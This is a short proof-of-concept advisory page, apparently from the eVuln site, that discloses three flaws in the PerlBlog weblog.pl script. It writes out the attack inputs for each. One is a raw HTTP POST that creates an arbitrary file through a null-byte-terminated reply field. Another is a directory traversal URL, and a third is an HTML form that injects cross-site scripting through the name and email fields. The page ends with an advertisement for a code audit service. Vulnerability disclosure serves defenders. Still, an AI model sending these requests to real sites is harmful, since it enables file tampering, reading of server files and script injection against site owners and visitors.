PoC/Exploit for Multiple Vulnerabilities in PerlBlog

Published Proof of Concept code - Multiple Vulnerabilities in PerlBlog.

Description
Available
Solution
Not available - check vendor's website

1. Arbitrary file creation with user-defined data.
HTTP query example:

POST /cgi-bin/perlblog/weblog.pl HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 124

date=02/14/2006-23:33&headerfile=200505&subject=Re: Welcome!&reply=[anyfilename]%00&name=[anytext]&body=[anytext]&post=reply



2. Directory traversal vulnerability.

http://[host]/cgi-bin/perlblog/weblog.pl?month=../license

3. Cross-Site Scripting vulnerability.

<FORM NAME="forum" ACTION="http://[host]/cgi-bin/perlblog/weblog.pl" METHOD="POST">
<INPUT NAME="date" VALUE="02/14/2006-23:33">
<INPUT NAME="headerfile" VALUE="200505">
<INPUT NAME="subject" VALUE="Re: Welcome!">
<INPUT NAME="reply" VALUE="1">
<INPUT NAME="post" VALUE="reply">
<INPUT TYPE="TEXT" NAME="name" value='[XSS]'>
<INPUT TYPE="TEXT" NAME="email" value='">[XSS]'>
<TEXTAREA></TEXTAREA>
<INPUT TYPE="Submit" VALUE="Post Comment">
</FORM>

Order Source Code Audit

Protect against attacks by source code analysis of a site made by eVuln team.The task will be done by experts in web security.

Advisories by vuln type